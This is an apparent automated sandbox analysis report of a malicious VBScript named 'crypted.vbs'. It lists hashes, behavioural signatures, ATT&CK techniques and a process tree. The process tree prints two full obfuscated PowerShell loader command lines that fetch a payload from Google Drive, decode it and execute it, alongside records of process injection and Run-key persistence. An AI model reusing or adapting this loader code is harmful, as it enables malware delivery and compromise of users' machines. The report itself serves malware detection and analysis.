3fa5856d8953d4693ed6caf9cb26d3e9b99d5a672b490e91e226ae06c766ac54

General

Target

crypted.vbs
Size

1.1MB
MD5

b2f1fecda8bf0c6127eba0a1c753bab4
SHA1

a42be5a38938b46014c07a0f2e33ff98cc130ac5
SHA256

3fa5856d8953d4693ed6caf9cb26d3e9b99d5a672b490e91e226ae06c766ac54
SHA512

fd38551f3ad476cc9eb76ec35c99fb2f6199297d0dfd5c1ebe670e081d4a615f50d1ef4a1a1341857dab573aa92a65d5ed506442e6ca4acf0838c6c376630a48
SSDEEP

12288:431cvBzbU01qal638iNX3iTMgmuYtWN/ZgMiQPeRjI:4Yz64+2SjI

Score

8^/10

persistence

Malware Config

Signatures

Adds policy Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Key created	\Registry\User\S-1-5-21-2297530677-1229052932-2803917579-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	certreq.exe

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	1756	powershell.exe
7	1756	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Run\6V6TZJC = "C:\\Program Files (x86)\\windows mail\\wab.exe"	certreq.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
9	drive.google.com
4	drive.google.com
5	drive.google.com

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
2592	wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2300	powershell.exe
2592	wab.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 2300 set thread context of 2592	2300	powershell.exe	34
PID 2592 set thread context of 1160	2592	wab.exe	20
PID 2592 set thread context of 240	2592	wab.exe	39
PID 240 set thread context of 1160	240	certreq.exe	20

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 28 IoCs

pid	Process
1756	powershell.exe
2300	powershell.exe
2300	powershell.exe
2592	wab.exe
2592	wab.exe
2592	wab.exe
2592	wab.exe
2592	wab.exe
2592	wab.exe
2592	wab.exe
2592	wab.exe
240	certreq.exe
240	certreq.exe
240	certreq.exe
240	certreq.exe
240	certreq.exe
240	certreq.exe
240	certreq.exe
240	certreq.exe
240	certreq.exe
240	certreq.exe
240	certreq.exe
240	certreq.exe
240	certreq.exe
240	certreq.exe
240	certreq.exe
240	certreq.exe
240	certreq.exe

Suspicious behavior: MapViewOfSection 6 IoCs

pid	Process
2300	powershell.exe
2592	wab.exe
1160	Explorer.EXE
1160	Explorer.EXE
240	certreq.exe
240	certreq.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1756	powershell.exe
Token: SeDebugPrivilege	2300	powershell.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 1544 wrote to memory of 1756	1544	WScript.exe	28
PID 1544 wrote to memory of 1756	1544	WScript.exe	28
PID 1544 wrote to memory of 1756	1544	WScript.exe	28
PID 1756 wrote to memory of 1964	1756	powershell.exe	30
PID 1756 wrote to memory of 1964	1756	powershell.exe	30
PID 1756 wrote to memory of 1964	1756	powershell.exe	30
PID 1756 wrote to memory of 2300	1756	powershell.exe	32
PID 1756 wrote to memory of 2300	1756	powershell.exe	32
PID 1756 wrote to memory of 2300	1756	powershell.exe	32
PID 1756 wrote to memory of 2300	1756	powershell.exe	32
PID 2300 wrote to memory of 1540	2300	powershell.exe	33
PID 2300 wrote to memory of 1540	2300	powershell.exe	33
PID 2300 wrote to memory of 1540	2300	powershell.exe	33
PID 2300 wrote to memory of 1540	2300	powershell.exe	33
PID 2300 wrote to memory of 2592	2300	powershell.exe	34
PID 2300 wrote to memory of 2592	2300	powershell.exe	34
PID 2300 wrote to memory of 2592	2300	powershell.exe	34
PID 2300 wrote to memory of 2592	2300	powershell.exe	34
PID 2300 wrote to memory of 2592	2300	powershell.exe	34
PID 2300 wrote to memory of 2592	2300	powershell.exe	34
PID 1160 wrote to memory of 240	1160	Explorer.EXE	39
PID 1160 wrote to memory of 240	1160	Explorer.EXE	39
PID 1160 wrote to memory of 240	1160	Explorer.EXE	39
PID 1160 wrote to memory of 240	1160	Explorer.EXE	39

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1160
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\crypted.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1544
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Flyvercertifikatet = 1;Function Kindergarten($Orgament){$Dissektionsstue=$Orgament.Length-$Flyvercertifikatet;$Ordensmagterne='Substring';For( $Snebrrenes=7;$Snebrrenes -lt $Dissektionsstue;$Snebrrenes+=8){$Mousemill115+=$Orgament.$Ordensmagterne.Invoke( $Snebrrenes, $Flyvercertifikatet);}$Mousemill115;}function Stormtight63($Disponering){ & ($Determinating) ($Disponering);}$Terraced=Kindergarten 'DomestiMAnkelseo Aabe.bzVinniduiMenjah l ,ovedvlSortsreaBrayefr/Nonesur5 verfr.Plnekli0Longl.n Gawain (StttevvWKeratoii.onphrenSangfugd ,ngratoTvangfrwBrownbus Ligni, SolidarN SemnonTProcess Alpelan1comi,oc0genials.Substan0Exterri;Roentge Coddle.WGiftendiAnotusanValutah6Drawlyf4Outtowe;Frprisr LeoparxGladlie6Fo.egif4 mmana;Kon.ess Boi err Blads,vR,psbin:Miscolo1 Embonp2Kwartas1Stethop.H,ggadi0Akv rie)Buestrg PersulGCoharmoeSamuraic Un inik cen.oroUndecen/In.orni2noncorr0 Biblio1 Skamfu0Ko,pora0transl 1jamb re0Aabenba1Reg.ner jacquarFStorstaiMennue r,onesoteKnoj,rnf grilleoHumptysxMultipl/Besgene1Drought2Perineo1Und cay.Inexpug0Beskygg ';$Woollies=Kindergarten 'BorgerfU Ocul,msBeslagle Ne.etsr Komman-O.gldenAThera eg bahut.eAnslagsnTrafikhtO.gelby ';$Unforgiveness=Kindergarten ' Sympath Verbost,esolattfoelgerpbanan.tsOsirian:Mystik,/Samme.b/AflaastdVer,ensrYahrzeii Rapp,evAnterope Komple.FasciodgportlasoBefrienoRepenfogOvermttlMollifieImporty.IdolouscTelevisoEstray mKrydsre/pifteneubucksubcNoncart?redekameEntomb,xUgebla p FjolleoVen,isfrAmoe,idtHaemocy=FyrrenadGreerh,oS,ytkirwStenvggnKarrigsl k,ppenotidssvaaOutpartdLimonit&Azohumii Controd.upplem=Iso.las1NondeodpTelefonM anstteDFletfilE E,noloJAutotekfInflatoXOrthochyBlodfo.zMultimeg Frav.gyThgerhadPupperueUdskilnGYardarm_Rentede1Risi.ofx,aigaspAVenialkgTor.ediV UnwittkVirerneJ,evivaluflyve k0Boligti1Stambge3Tykmlks1Ube.gelzLeefja 8L,ljaopp.ofleveS DatabaVLadysli ';$kurvenes=Kindergarten ' .legma>Skydese ';$Determinating=Kindergarten ' .kiffei,gnersgeentringxNybblem ';$Slesvigernes100='Refigenens';$Laerebogen = Kindergarten 'SmrerieeC nsonacDistribhFjledeao,nequil Orthodo%LagtingaSlumrespPostth.pGuldnldd HolograKoppevatBoldspiaActiv.s%Infruct\AftnedeBZweckstiNedpljelUnacouslForfrdee Servomd F.lholeTange,trtrafficnAvisinte Copros.Oksest.BfaenusbuLabiallgPhalaro T mbrop& Vandpl&Hjdepun Tnder eNiv audcUnco,cehUnpa,cho Kasses Photo.otArturs, ';Stormtight63 (Kindergarten 'Rigsbib$DatakopgUncourtl squeggoMatriklbFore hoaBegraveldialekt:TankfulH BeredseMi wirif Phonemt DolleriMetepaplFor,fteyKendete= K.insm(AntimiscMavelanmInse.sidTempera ,usinkj/Cedrat.cProblem Austral$TricyklLFenyle aRigsstaeStewardrBall deeGarglerbStroemmo GinerngKrapyleeEditerin ajlefo)Fordyre ');Stormtight63 (Kindergarten 'Udveje,$ BlacklgAfskedslUnhomeloIndiciabStut era UdmarclSucc so: DominiA bijugor SvumnivDepu.ise ZophiapReinstirurbanizi,aldachn TutteksWoodcresBddelks=uninte.$OverrapU AchillnP.rsulpfKultureoScepterr Fjer ogUnruin ii devotvThri,tie Se.monnHurt gueS ittens lderp.sS utste.Sh.phersUr.litipSpeciallAabne uiFil,ematUndta.e( Social$Thurifek bservauMiljoebr FriborvJa.kwooeForkodnnposekigeSky.digs rocedu) Copart ');$Unforgiveness=$Arveprinss[0];$Anatomopathologic= (Kindergarten 'Onomato$IldslukgModesaglMacheteordnsedebSpeljvea etaratlMinueti: TraducS estearoAlfabe.p ,ropodhShimperiNonchalsStudehat,amqxsgiNonwondc emapho=KolprofN Salo neGrandfawOverl x-SlethugO PlaypebKonomigjAeroborePu hsticAbonnert Ind,nk InddtboSVenderey,epugnasYercumetUnope,ceD scentmN natom. ekstenNPro ogkeLngdernt Nephri. Spat iW katapueColumnibS.ovhugC Blge rlVenetiaicr,cifoeTilfr,enA cidiot');$Anatomopathologic+=$Heftily[1];Stormtight63 ($Anatomopathologic);Stormtight63 (Kindergarten 'Udkeled$Dep.ctoSEro,enooWithstap Hilst.h PalatoiPseudossLutterwtRubric.i.verstrc Huccat.RuskvejH iskote,elautoaUdgivesdPrimovie orgingrLadlesksretsins[Decemvi$VurderiWBlokbesoArcti.ooSteatoplomdispolOproer.iAgnersoeFjantetsSuperab]blankoc=Vallis,$MowableTImpleadeAmen.olrunoptiorAtom,praVk.elsec Lat.eueradiotedPrearms ');$Complexions=Kindergarten 'Han out$Asme,rrS Towneeo Tilf epOvergivhstangvgi estikusFladvantAmericai ,athwocDeligat.ginnersDMagazinoPr.voyawSocialmnA phitolAfrus.eoThistedaSpa.hawd uritanFErythroi Teks,ulFahrenheStreetw(Endamag$ProteinUGuruernnAlfionafCranklyo TtesagrNdringsgPremodeiIndterpv CombateKred.tonMigrneseBlodfatsV.ritissCubitoi,Brusked$.psprtnNfurendeo En,rewnRereward Wa dcoeS.gelsenKontaktsMiljbeseUnconge)Affran. ';$Nondense=$Heftily[0];Stormtight63 (Kindergarten 'Hesitat$ forvalgReceptulDilatatoMiddagebWorshipa iscrel Audien:t merplKGaffeldeCannibaeFoamie,lJ.nvippeStrisserSpidsbo=Welcome( myotrTSiluroieChemicksUdsvejftTusseru-TilbagePAmbassaaIm,umsctRepatrohBri nly Ansttel$ MainbrN Skoleko KolbasnHjemegndDominaneFordr.snImpri es AutopheP edege)D tanet ');while (!$Keeler) {Stormtight63 (Kindergarten 'Tourned$UncontegGorgerilAirm,iloSocialgb indiffaFilmmaglKookies:DeepeneGUniversoForvaskvC owdedeUdpantnr SingulnRen rykmFicti.neJagtshyn BarsletAfmnstraPanterslSporozoiSurferesSkattebmunmorbi=Hrev np$Fre.stdt SiddevrFracturu Avlshoe Brdsfu ') ;Stormtight63 $Complexions;Stormtight63 (Kindergarten 'SpaltefS ta.estt WavewiaMaalestrRouthyat Styrke- ,ogheaS Brusn,lMinimumeLotusseeSubventp Arbejd skrdder4Shampon ');Stormtight63 (Kindergarten ',oshest$idahdragComp etl Kerneoo SensefbSkemadsaNonflagl Me,alb:AnosmiaKFacetteeFoujda,eBar umslInsu aneU.derafrArctias= Br gge( CyclitTUnsturde.hogglesUncontrtInterna-TempereP,onsigna BesvantSplenomh Marine Prehen$FluxiliNDevotiooPlantetnBlotchidSubcasieTypeb,snPetaloisA,bejdse O,talk) Vers,o ') ;Stormtight63 (Kindergarten 'D takra$Go serig RenovalWealdsmochange,b Trspr aBgenonnlMen.esk:AfkalkeSDiscovetPilausheM,ntricd Embed.fOkapiibaPresleydMarishyeLandholrexophaseB sbeeinCo.pute=Fremtid$YttriumgamoeboblMa,inedoHjlp,mib Nau.icaKuldegylKaresse: StampuNshinenduM lieuapty,ogras InceptoBifagetnmatricu+Johnasm+ Ordreb% agters$EschatoAMudguarrIntox.cvPersiane Hjemmep EgyptorBortdsliTrumpetnPayboxhsfa,iscas tranqu.Regionpc Tredjeoex.endiu Com.lin SolsortJssesfu ') ;$Unforgiveness=$Arveprinss[$Stedfaderen];}$Lensgrevelige=301111;$Disambiguating=30264;Stormtight63 (Kindergarten ' aliter$Par,basgIntervilAtmiatroUroe,debEftermoaUnwor,ilParamec: KontorK ntikkr Lauhngo PurlgenFraidycuUnd.rtirsyphili2Plotted4Editeri Be.igt=Taareka Ledte.kG P ranueIagttagtBilater- usioneCStrengeoE,nsbesn ermigetAdresseeP adeskn dvrgpat Satiri Skjal.e$WartproNIlonetro,xcitabnundergrdTelefoneMarronsn Ka.ibrsGeodiateSalgsvr ');Stormtight63 (Kindergarten ' S.dame$ Hjspndg VerdiclImprisoo MotorkbRegnskaa KauderlPrusten:RaadeliB BerskieManoeuvnSpri.tabSolenesu,esolutk Be,alikM.rabuteSustenanBernieseParamer Dunst.r=Forplum Lsrefor[SteadfaSGo.nesey lueyhesSilkebotAnno ereMistr,tmRutebil.,auntinCShipmaso elasbnFejringvUdprinterenoncerSupinumtFib.isa]Dobbelt: Tekstm:Forskr.FUnoedvernegles,oEgritudmmanualiBGlobenracabern.s Trave.eSoubret6Prem ni4Prepos,SBrshajetP osphorP.raderi KastennValg,agg Hydros(Interna$HexdracK,vivaler Udvik o F,avnnnCitifyiuMonisterBabbitt2Postica4moosewe) Martyr ');Stormtight63 (Kindergarten 'Konstru$Re levigSpradeblNonirrao ,nguilbHandsf,a ConeyklSkatt.s:GalgenfD VrvleheTandlgekSeacockl whitt,iGl,ssocnEnkeltva.ivieovtNitallei UgleseoPseudo nMurrnoneKamf rtr Arvebe1 P atte1e,zones4 gnora ops.aa=for.rig Phobism[ V,ldfaS chicneyVertimes Indstut S knineDeletegmSylihis.FremfrdTUdlufteest mmerx tremat Stra.f.ScribisE,dbollenSupinercDivideno RecorrdUnthinkiBelieflnBlawnhagLeasing]Enterop:Untrans:herskabA,soleriSUddanneCfd.elsdIToa uprIKnaphul.AbuleiaG funli,e Sa,chatCurrie S vandfotCounterrOleometiOplysninmg,ingegSi kerh( E hisb$PaucipiB VirilieFortsatnSpartlebSpecia.uCrepusck ilfrsekPrecheceAcrockonAlfer peSabaeis)Natio a ');Stormtight63 (Kindergarten 'Diapsid$Sten.ldgPos,entlUncostuoEpentheb FllessaUndevell euphor:SkarkseFTartareoInspicetSc,urinoBicycleg Carpogr uglereahypnotifGravhuniPr,chloeDome,tirUnefful=Turi.tb$UdlaanvD.rineskeLeveal kGavltaglAren,siiRversmin Akkre,a FravrstAmericaiGaa.sdaoS ookprnPollenje Dilu,orMjavede1Squill,1 G,andd4Hogmana.KalibresHornstruBlokke.bAtrochosFormid tPedaliarSek sopiLe,ticenDo.inergUnderdo(.resier$RegulatL Alimene Tri,penH,rliges TestsigDigitalr MajorieKastanjv Sluk,ieSa.frerl omikkei Bevessg BoligfeBruskbo,Angloma$SaussurDSpiremeiWizard,sPsycho.aForhaanmUndsigebHensigtiVanskelgPrefer.u Ufortjaimmin,nt klipseiSupin,tnI,adesmgUdetill)I mense ');Stormtight63 $Fotografier;"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1756
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Billederne.Bug && echo t"
      4⤵
      PID:1964
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Flyvercertifikatet = 1;Function Kindergarten($Orgament){$Dissektionsstue=$Orgament.Length-$Flyvercertifikatet;$Ordensmagterne='Substring';For( $Snebrrenes=7;$Snebrrenes -lt $Dissektionsstue;$Snebrrenes+=8){$Mousemill115+=$Orgament.$Ordensmagterne.Invoke( $Snebrrenes, $Flyvercertifikatet);}$Mousemill115;}function Stormtight63($Disponering){ & ($Determinating) ($Disponering);}$Terraced=Kindergarten 'DomestiMAnkelseo Aabe.bzVinniduiMenjah l ,ovedvlSortsreaBrayefr/Nonesur5 verfr.Plnekli0Longl.n Gawain (StttevvWKeratoii.onphrenSangfugd ,ngratoTvangfrwBrownbus Ligni, SolidarN SemnonTProcess Alpelan1comi,oc0genials.Substan0Exterri;Roentge Coddle.WGiftendiAnotusanValutah6Drawlyf4Outtowe;Frprisr LeoparxGladlie6Fo.egif4 mmana;Kon.ess Boi err Blads,vR,psbin:Miscolo1 Embonp2Kwartas1Stethop.H,ggadi0Akv rie)Buestrg PersulGCoharmoeSamuraic Un inik cen.oroUndecen/In.orni2noncorr0 Biblio1 Skamfu0Ko,pora0transl 1jamb re0Aabenba1Reg.ner jacquarFStorstaiMennue r,onesoteKnoj,rnf grilleoHumptysxMultipl/Besgene1Drought2Perineo1Und cay.Inexpug0Beskygg ';$Woollies=Kindergarten 'BorgerfU Ocul,msBeslagle Ne.etsr Komman-O.gldenAThera eg bahut.eAnslagsnTrafikhtO.gelby ';$Unforgiveness=Kindergarten ' Sympath Verbost,esolattfoelgerpbanan.tsOsirian:Mystik,/Samme.b/AflaastdVer,ensrYahrzeii Rapp,evAnterope Komple.FasciodgportlasoBefrienoRepenfogOvermttlMollifieImporty.IdolouscTelevisoEstray mKrydsre/pifteneubucksubcNoncart?redekameEntomb,xUgebla p FjolleoVen,isfrAmoe,idtHaemocy=FyrrenadGreerh,oS,ytkirwStenvggnKarrigsl k,ppenotidssvaaOutpartdLimonit&Azohumii Controd.upplem=Iso.las1NondeodpTelefonM anstteDFletfilE E,noloJAutotekfInflatoXOrthochyBlodfo.zMultimeg Frav.gyThgerhadPupperueUdskilnGYardarm_Rentede1Risi.ofx,aigaspAVenialkgTor.ediV UnwittkVirerneJ,evivaluflyve k0Boligti1Stambge3Tykmlks1Ube.gelzLeefja 8L,ljaopp.ofleveS DatabaVLadysli ';$kurvenes=Kindergarten ' .legma>Skydese ';$Determinating=Kindergarten ' .kiffei,gnersgeentringxNybblem ';$Slesvigernes100='Refigenens';$Laerebogen = Kindergarten 'SmrerieeC nsonacDistribhFjledeao,nequil Orthodo%LagtingaSlumrespPostth.pGuldnldd HolograKoppevatBoldspiaActiv.s%Infruct\AftnedeBZweckstiNedpljelUnacouslForfrdee Servomd F.lholeTange,trtrafficnAvisinte Copros.Oksest.BfaenusbuLabiallgPhalaro T mbrop& Vandpl&Hjdepun Tnder eNiv audcUnco,cehUnpa,cho Kasses Photo.otArturs, ';Stormtight63 (Kindergarten 'Rigsbib$DatakopgUncourtl squeggoMatriklbFore hoaBegraveldialekt:TankfulH BeredseMi wirif Phonemt DolleriMetepaplFor,fteyKendete= K.insm(AntimiscMavelanmInse.sidTempera ,usinkj/Cedrat.cProblem Austral$TricyklLFenyle aRigsstaeStewardrBall deeGarglerbStroemmo GinerngKrapyleeEditerin ajlefo)Fordyre ');Stormtight63 (Kindergarten 'Udveje,$ BlacklgAfskedslUnhomeloIndiciabStut era UdmarclSucc so: DominiA bijugor SvumnivDepu.ise ZophiapReinstirurbanizi,aldachn TutteksWoodcresBddelks=uninte.$OverrapU AchillnP.rsulpfKultureoScepterr Fjer ogUnruin ii devotvThri,tie Se.monnHurt gueS ittens lderp.sS utste.Sh.phersUr.litipSpeciallAabne uiFil,ematUndta.e( Social$Thurifek bservauMiljoebr FriborvJa.kwooeForkodnnposekigeSky.digs rocedu) Copart ');$Unforgiveness=$Arveprinss[0];$Anatomopathologic= (Kindergarten 'Onomato$IldslukgModesaglMacheteordnsedebSpeljvea etaratlMinueti: TraducS estearoAlfabe.p ,ropodhShimperiNonchalsStudehat,amqxsgiNonwondc emapho=KolprofN Salo neGrandfawOverl x-SlethugO PlaypebKonomigjAeroborePu hsticAbonnert Ind,nk InddtboSVenderey,epugnasYercumetUnope,ceD scentmN natom. ekstenNPro ogkeLngdernt Nephri. Spat iW katapueColumnibS.ovhugC Blge rlVenetiaicr,cifoeTilfr,enA cidiot');$Anatomopathologic+=$Heftily[1];Stormtight63 ($Anatomopathologic);Stormtight63 (Kindergarten 'Udkeled$Dep.ctoSEro,enooWithstap Hilst.h PalatoiPseudossLutterwtRubric.i.verstrc Huccat.RuskvejH iskote,elautoaUdgivesdPrimovie orgingrLadlesksretsins[Decemvi$VurderiWBlokbesoArcti.ooSteatoplomdispolOproer.iAgnersoeFjantetsSuperab]blankoc=Vallis,$MowableTImpleadeAmen.olrunoptiorAtom,praVk.elsec Lat.eueradiotedPrearms ');$Complexions=Kindergarten 'Han out$Asme,rrS Towneeo Tilf epOvergivhstangvgi estikusFladvantAmericai ,athwocDeligat.ginnersDMagazinoPr.voyawSocialmnA phitolAfrus.eoThistedaSpa.hawd uritanFErythroi Teks,ulFahrenheStreetw(Endamag$ProteinUGuruernnAlfionafCranklyo TtesagrNdringsgPremodeiIndterpv CombateKred.tonMigrneseBlodfatsV.ritissCubitoi,Brusked$.psprtnNfurendeo En,rewnRereward Wa dcoeS.gelsenKontaktsMiljbeseUnconge)Affran. ';$Nondense=$Heftily[0];Stormtight63 (Kindergarten 'Hesitat$ forvalgReceptulDilatatoMiddagebWorshipa iscrel Audien:t merplKGaffeldeCannibaeFoamie,lJ.nvippeStrisserSpidsbo=Welcome( myotrTSiluroieChemicksUdsvejftTusseru-TilbagePAmbassaaIm,umsctRepatrohBri nly Ansttel$ MainbrN Skoleko KolbasnHjemegndDominaneFordr.snImpri es AutopheP edege)D tanet ');while (!$Keeler) {Stormtight63 (Kindergarten 'Tourned$UncontegGorgerilAirm,iloSocialgb indiffaFilmmaglKookies:DeepeneGUniversoForvaskvC owdedeUdpantnr SingulnRen rykmFicti.neJagtshyn BarsletAfmnstraPanterslSporozoiSurferesSkattebmunmorbi=Hrev np$Fre.stdt SiddevrFracturu Avlshoe Brdsfu ') ;Stormtight63 $Complexions;Stormtight63 (Kindergarten 'SpaltefS ta.estt WavewiaMaalestrRouthyat Styrke- ,ogheaS Brusn,lMinimumeLotusseeSubventp Arbejd skrdder4Shampon ');Stormtight63 (Kindergarten ',oshest$idahdragComp etl Kerneoo SensefbSkemadsaNonflagl Me,alb:AnosmiaKFacetteeFoujda,eBar umslInsu aneU.derafrArctias= Br gge( CyclitTUnsturde.hogglesUncontrtInterna-TempereP,onsigna BesvantSplenomh Marine Prehen$FluxiliNDevotiooPlantetnBlotchidSubcasieTypeb,snPetaloisA,bejdse O,talk) Vers,o ') ;Stormtight63 (Kindergarten 'D takra$Go serig RenovalWealdsmochange,b Trspr aBgenonnlMen.esk:AfkalkeSDiscovetPilausheM,ntricd Embed.fOkapiibaPresleydMarishyeLandholrexophaseB sbeeinCo.pute=Fremtid$YttriumgamoeboblMa,inedoHjlp,mib Nau.icaKuldegylKaresse: StampuNshinenduM lieuapty,ogras InceptoBifagetnmatricu+Johnasm+ Ordreb% agters$EschatoAMudguarrIntox.cvPersiane Hjemmep EgyptorBortdsliTrumpetnPayboxhsfa,iscas tranqu.Regionpc Tredjeoex.endiu Com.lin SolsortJssesfu ') ;$Unforgiveness=$Arveprinss[$Stedfaderen];}$Lensgrevelige=301111;$Disambiguating=30264;Stormtight63 (Kindergarten ' aliter$Par,basgIntervilAtmiatroUroe,debEftermoaUnwor,ilParamec: KontorK ntikkr Lauhngo PurlgenFraidycuUnd.rtirsyphili2Plotted4Editeri Be.igt=Taareka Ledte.kG P ranueIagttagtBilater- usioneCStrengeoE,nsbesn ermigetAdresseeP adeskn dvrgpat Satiri Skjal.e$WartproNIlonetro,xcitabnundergrdTelefoneMarronsn Ka.ibrsGeodiateSalgsvr ');Stormtight63 (Kindergarten ' S.dame$ Hjspndg VerdiclImprisoo MotorkbRegnskaa KauderlPrusten:RaadeliB BerskieManoeuvnSpri.tabSolenesu,esolutk Be,alikM.rabuteSustenanBernieseParamer Dunst.r=Forplum Lsrefor[SteadfaSGo.nesey lueyhesSilkebotAnno ereMistr,tmRutebil.,auntinCShipmaso elasbnFejringvUdprinterenoncerSupinumtFib.isa]Dobbelt: Tekstm:Forskr.FUnoedvernegles,oEgritudmmanualiBGlobenracabern.s Trave.eSoubret6Prem ni4Prepos,SBrshajetP osphorP.raderi KastennValg,agg Hydros(Interna$HexdracK,vivaler Udvik o F,avnnnCitifyiuMonisterBabbitt2Postica4moosewe) Martyr ');Stormtight63 (Kindergarten 'Konstru$Re levigSpradeblNonirrao ,nguilbHandsf,a ConeyklSkatt.s:GalgenfD VrvleheTandlgekSeacockl whitt,iGl,ssocnEnkeltva.ivieovtNitallei UgleseoPseudo nMurrnoneKamf rtr Arvebe1 P atte1e,zones4 gnora ops.aa=for.rig Phobism[ V,ldfaS chicneyVertimes Indstut S knineDeletegmSylihis.FremfrdTUdlufteest mmerx tremat Stra.f.ScribisE,dbollenSupinercDivideno RecorrdUnthinkiBelieflnBlawnhagLeasing]Enterop:Untrans:herskabA,soleriSUddanneCfd.elsdIToa uprIKnaphul.AbuleiaG funli,e Sa,chatCurrie S vandfotCounterrOleometiOplysninmg,ingegSi kerh( E hisb$PaucipiB VirilieFortsatnSpartlebSpecia.uCrepusck ilfrsekPrecheceAcrockonAlfer peSabaeis)Natio a ');Stormtight63 (Kindergarten 'Diapsid$Sten.ldgPos,entlUncostuoEpentheb FllessaUndevell euphor:SkarkseFTartareoInspicetSc,urinoBicycleg Carpogr uglereahypnotifGravhuniPr,chloeDome,tirUnefful=Turi.tb$UdlaanvD.rineskeLeveal kGavltaglAren,siiRversmin Akkre,a FravrstAmericaiGaa.sdaoS ookprnPollenje Dilu,orMjavede1Squill,1 G,andd4Hogmana.KalibresHornstruBlokke.bAtrochosFormid tPedaliarSek sopiLe,ticenDo.inergUnderdo(.resier$RegulatL Alimene Tri,penH,rliges TestsigDigitalr MajorieKastanjv Sluk,ieSa.frerl omikkei Bevessg BoligfeBruskbo,Angloma$SaussurDSpiremeiWizard,sPsycho.aForhaanmUndsigebHensigtiVanskelgPrefer.u Ufortjaimmin,nt klipseiSupin,tnI,adesmgUdetill)I mense ');Stormtight63 $Fotografier;"
      4⤵
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2300
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Billederne.Bug && echo t"
        5⤵
        
        PID:1540
    - - C:\Program Files (x86)\windows mail\wab.exe
        
        "C:\Program Files (x86)\windows mail\wab.exe"
        5⤵
        Suspicious use of NtCreateThreadExHideFromDebugger
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:2592
- C:\Windows\SysWOW64\certreq.exe
  "C:\Windows\SysWOW64\certreq.exe"
  2⤵
  - Adds policy Run key to start application
  - Adds Run key to start application
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  PID:240

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

2

T1547

Registry Run Keys / Startup Folder

2

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

2

T1547

Registry Run Keys / Startup Folder

2

T1547.001

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Beachless.txt

Filesize
2KB

MD5
f94df57c91ccb338a68b9da46cdc0558

SHA1
4cf6b9a5f9330934e071530d427bd95dad627a04

SHA256
817d5152f7299d015ed99809b364883929be444863a080db0d7f26a51e879e02

SHA512
d95188d314a430e0ff1f9d3ba69eed7e4d2f54c99f319d632615694589b087d107677938fdc01c616436b3c882cf2916e8203f6f70f40638ba05c59fec6c858a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Beachless.txt

Filesize
455B

MD5
af64554567b1ac873e39cd434542f01c

SHA1
76a21f910f9932145973aa1e6a4e2767203949df

SHA256
f9f4c14609cfbc47ef480ce29e2aff98312ce32cd72ef12c6579ec3cb67e3cf2

SHA512
4823b19d558d7095ea25e95ffd76b2a7c099605c6ff20032bf81bc234ed576cbb4daf9999e624730792350f150240db082ec72bfd9159524bb70a111e31f321d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Beachless.txt

Filesize
3KB

MD5
11066923e7973faa41b2aae1abc2b8e2

SHA1
d811899cebbf3d96c38d44390475b83aff46227c

SHA256
59260ebeaa85c90c837d993a8e74159bd10f99b7747922cc59b6fdd3fe443672

SHA512
8c5c72af694630a036348837d5765f4280a681242749b9bb62dc2dc93f943f7acb01e79d489ef8b28dad2957612f9bee11d6df29f7cfa35d9291ab1202b767ba

Download Submit
C:\Users\Admin\AppData\Local\Temp\Beachless.txt

Filesize
4KB

MD5
c520be51830b1375c5465bb7f8fe0bf4

SHA1
755439db59cc6fb8f37ab9eb5cde496915cc4752

SHA256
a120c6f580e65409b19c2d37b810755f88718bc09d0059862c12c996a491e3a3

SHA512
